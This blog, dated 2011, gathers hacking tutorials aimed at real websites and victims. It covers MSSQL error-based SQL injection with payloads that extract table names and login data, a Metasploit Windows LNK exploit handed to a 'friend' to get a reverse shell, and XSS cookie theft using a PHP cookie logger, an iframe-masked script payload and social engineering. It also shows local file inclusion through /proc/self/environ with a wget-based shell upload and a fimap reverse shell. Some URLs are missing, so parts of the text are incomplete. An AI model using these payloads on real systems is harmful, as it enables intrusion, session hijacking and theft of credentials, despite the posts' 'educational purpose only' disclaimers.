Thursday, November 3, 2011

MSSQL Injection

MSSQL Injection

Ex: google dork
find a result like :
Now to check if it is vuln or not

insert single quotation ' at the last :’
you get error like this:
Error:Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/some.asp, line 86      
Then you can proceed,system_user)

(* here you can observe that we are trying to convert but it doesn’t happen which inturn shows the db name that it cant convert into int).

So it shows error , by showing the db name  like:
Error: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'usr' to a column of data type int.
/some.asp, line 86
In the error it shows some db name as “usr” .
We try to bring all the available tables in a database :,select+top+1+table_name+from+information_schema.tables))
(here information_schema is the database , this you can find in myphp).
We get error like :
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'galery' to a column of data type int.
/some.asp, line 86

(here table name is galery)

But no login credentials will be in the galery table ,To find the Second table name,select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('galery')))

we get table name as users
now to find columns in users table:,select+top+1+column_name+from+information_schema.columns+where+table_name='users'))

we get this

Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'username' to a column of data type int.
/some.asp, line 86
To find second column folow the above step like finding the second table name
Now we need to find the values in the table with columns username and password and+1=convert(int,(select+top+1+username+from+users))
 same as like for finding value in password field too.
Got it.?

[ * Warning : Im not responsible for your actions , this is for educational purpose only . ]

Tuesday, October 25, 2011

Windows lnk Exploit

Hack the system using the windows lnk exploit:

Update metasploit.
Goto the prompt and goto framework

Then type:


Msf>prompt opens..

The search for the exploit windows lnk.

Msf>search lnk

Then it shows the exploit


then type:
msf>use exploitname(type above exploit)

set SRVHOST  tat is your local ip to get conection back
Then set payload

Shell/reverse_tcp payload works mostly

so type:

msf>set payload windows/metxxxxx/xxx_tcp
then set LHOST as your local ip

then type:


you will be shown a url or address with port number..give it to ur friend
tada !
wait for the reverse connection.
Warning: Im not responsible for ur actions , just for educational purpose only

Cookie Grabbing using XSS

XSS means Cross-site Scripting is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users.

There are two types of XSS : Non-Persistent and Persistent.
If u need to know about persistent and non-persistent click here .

Now ..
Search for vulnerability in a site: its on you
This is a simple example here:

Make sure that you have a site where the cookie needs to be uploded..
(Where a link has to be sent and script executes )
Upload the below php script in your site ex:1.php


$cookie=$_GET[‘cookie’];     //storing cookies in a variable called $cookie.
$file=fopen(“cookies.txt”,”a”);  //opening a file called cookies.txt with append mode.

Save it as “ 1.php

Now the url looks like :

Find vuln in a site then put it like this below :<script>document.location=''.concat(escape(document.cookie));</script>

 now send this link but,mostly people wont click it because they find this url very suspicious.
So u need to mask it


src="<script>document.location=''.concat(escape(document.cookie));</script>" width="1" heigth="1"></iframe>
Now put this script in file called iclick.php .

Now your url looks like

Send this link to your friend or anyone else ask….(social engineer) to click on this link..
Tats it the cookies will be stored in cookies.txt file.
(download cookie editor addon and go on wat u want to do).

Warning: *** Im not reponsible for your actions. This is just for educational purpose only.

Tuesday, October 18, 2011

LFI (Local File Inclusion)

LFI bounce using chunked transfer encoding

Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.
The vuln. Code looks like :

   $file = $_GET['file'];

Here from the code you can observe that its taking or including the file from locally.
To get LFI vuln sites use dork like :: inurl:php?id=*.php
The “ *.php” means that any file name with extension .php
Ex: inrul:php?page=contact.php, etc.
Or inurl:.php?file=somefile.php
(* im not Responsible for any of the actions for what you do , Just Educational purpose only)
There are two ways : Manual and automated.

MANUAL way for LFI:

proc/self/environ method:

 check for vuln site same as above


Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

we got error and no etc/passwd file.

*so we go more directories up

If you get like:

 we succesfully included the etc/passwd file.

The check for /proc/self/environ (in place of /etc/passwd) we get message like :

The we need Tamper data addon on firefox :

Choose Tamper and in User-Agent filed write the following code :

<?system('wget -O shel.php');?>

Then submit the request.

(*here shel.txt must contain the shel code where we are getting from other site using wget command*)

Tada !. shel uploaded. J

Warning: I am not responsible for your actions , please be careful.this is for educational purpose only.


now remove the file name in the url and replace with “ ../ “ (without quotes)
if you get error like ::

Warning: include_once(../) [function.include-once]: failed to open stream: Inappropriate ioctl for device in /home/sitname /public_html/index.php on line 10

Warning: include_once() [function.include]: Failed opening '../' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in/home/sitename/public_html/index.php on line 10

It is vulnerable to LFI

Now to attack :
You need a python script called “ fimap “ which can be downloaded from google
U need python installed to execute it.

Open cmd prompt goto the folder where script is present and type ::
 “ –u

( -u :-  option for scan if vuln exists or not)

It tests for injecting a file where it is vulnerable : looks like this

Here from the above pic u can see at the bottom with : “ [1] /proc/self/environ “
0    (0- Clean/readable , 1- writable)

Now to exploit :: type: –x “

 (-x : to exploit ; -u : scan for vuln).

Now you will find like this :

Choose domain , well here u need to choose a number here my option is “9” ,the thing here is the fimap stores the history of successful exploiting . so choose number corresponding to the domain which u have scanned.
After that it asks for options again to choose type vuln script (choose the number ,if there is only one script the type 1).

Then again it asks for type of available attacks : they are:

1.spawn fimap shell

2.pentest monkey reverse shell

Select option 1.

It will successfully inject

Tada !  you get the command prompt of the host.

( as for pentest monkey shell ,you need netcat and an open port to get the connection back.)
Warning: I am not responsible for your actions , please be careful.this is for educational purpose only.
You hardly find LFI vuln sites ,you need work ur ass off to get the sites.

Twitter Delicious Facebook Digg Stumbleupon Favorites More